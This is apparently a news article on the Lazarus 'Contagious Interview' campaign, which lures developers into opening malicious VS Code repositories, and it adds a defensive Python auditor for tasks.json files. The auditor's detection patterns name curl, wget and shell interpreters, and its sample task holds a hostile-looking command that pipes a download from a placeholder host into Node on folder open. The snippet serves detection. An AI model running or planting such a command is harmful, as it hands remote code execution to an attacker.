**North Korean Hackers Target Microsoft Visual Studio Code in Sophisticated Attack**

North Korea's notorious hacking group, Lazarus, has once again proven its prowess in cyber warfare by exploiting a vulnerability in Microsoft Visual Studio Code (VS Code). As part of their infamous "Contagious Interview" campaign, the group created fake job postings to lure software and blockchain developers into interviews, where they would deploy malware on their devices, giving attackers unfettered access to their computers and employer networks.

The Contagious Interview campaign has been linked to some of the biggest cryptocurrency heists in recent years. Now, security researchers from Jamf have uncovered a new evolution in the group's tactics, which involves using legitimate Git repositories hosted on platforms like GitHub or GitLab to spread malware.

According to the report, the attackers create a malicious Git repository and trick victims into cloning it and opening it in VS Code during the interview process. VS Code then prompts the victim to trust the repository author. Once trust is granted, it automatically processes the repository's tasks.json configuration file, which triggers the arbitrary commands embedded in it.

On macOS devices, these commands use a background shell to remotely retrieve a JavaScript payload from a platform like Vercel and pipe it into the Node.js runtime. Once executed, the JavaScript payload establishes a persistent loop that harvests host information (hostname, MAC addresses, and OS details) and communicates with a remote command-and-control (C2) server.

Finally, the backdoor periodically pings the C2 server, sending system data and receiving further malicious JavaScript instructions. This sophisticated attack highlights the importance of vigilance in the face of cyber threats.

**What You Can Do to Protect Yourself**

Jamf is warning customers to enable Threat Prevention and Advanced Threat Controls on their Macs to remain protected against these techniques. Additionally, developers are advised to exercise caution when interacting with third-party repositories, especially those shared directly or originating from unfamiliar sources.

Before trusting a repository in VS Code, it's essential to review its contents. This is particularly crucial for software and blockchain developers who often work with sensitive code and data.
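
Part of that review can be done from a terminal before the folder is ever opened in VS Code. The following is an added example, not code from Jamf or from the original article: it parses the text of a repository's `.vscode/tasks.json` and flags commands matching the behaviour described above. It assumes the task relies on VS Code's `runOptions.runOn: "folderOpen"` setting to run without user action; the regex heuristics, function names and sample file are constructed for illustration.

```python
import json
import re

# Heuristics chosen for this example; they are not indicators from the Jamf report.
FETCH = re.compile(r"\b(curl|wget)\b", re.I)
TO_INTERPRETER = re.compile(r"\|\s*(node|sh|bash|zsh|python3?)\b", re.I)
BACKGROUND = re.compile(r"\bnohup\b|&\s*$")

def _scrub(text, junk):
    # Delete matches of `junk` while copying string literals through unchanged.
    pattern = r'("(?:\\.|[^"\\])*")|' + junk
    return re.sub(pattern, lambda m: m.group(1) or "", text, flags=re.S)

def parse_jsonc(text):
    """tasks.json allows comments and trailing commas, which json.loads rejects."""
    text = _scrub(text, r"//[^\n]*|/\*.*?\*/")
    return json.loads(_scrub(text, r",(?=\s*[}\]])"))

def command_lines(task):
    """Yield (platform, command line) for a task and its osx/linux/windows overrides."""
    for platform in ("all", "osx", "linux", "windows"):
        block = task if platform == "all" else task.get(platform)
        if isinstance(block, dict) and "command" in block:
            args = [str(a) for a in block.get("args", [])]  # str() keeps object-form args searchable
            yield platform, " ".join([str(block["command"]), *args])

def audit_tasks(text):
    """Return (label, platform, reasons) for every task command worth reading closely."""
    findings = []
    for task in parse_jsonc(text).get("tasks", []):
        auto = task.get("runOptions", {}).get("runOn") == "folderOpen"
        for platform, cmd in command_lines(task):
            reasons = ["runs automatically on folder open"] if auto else []
            if FETCH.search(cmd) and TO_INTERPRETER.search(cmd):
                reasons.append("pipes a download into an interpreter")
            if BACKGROUND.search(cmd):
                reasons.append("detaches into the background")
            if reasons:
                findings.append((task.get("label", "?"), platform, reasons))
    return findings

# Constructed sample with a placeholder host, shaped like the behaviour described above.
SAMPLE = r'''{"version": "2.0.0", // constructed for this example
 "tasks": [
  {"label": "build", "type": "shell", "command": "npm run build"},
  {"label": "env", "type": "shell", "command": "echo ok",
   "osx": {"command": "nohup sh -c 'curl -s https://example.invalid/p.js | node' &"},
   "runOptions": {"runOn": "folderOpen"},},
 ]}'''
```

Pass `audit_tasks` the text of `.vscode/tasks.json` read outside the editor. An empty result only means these heuristics did not match, so the file still needs to be read by hand.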


---

**About the Author**

Sead is a seasoned freelance journalist based in Sarajevo, Bosnia and Herzegovina. He writes about IT and cybersecurity topics, including cloud, IoT, 5G, VPN, ransomware, data breaches, and laws and regulations. With over a decade of experience, he has written for numerous media outlets, including Al Jazeera Balkans, and held content writing modules for Represent Communications.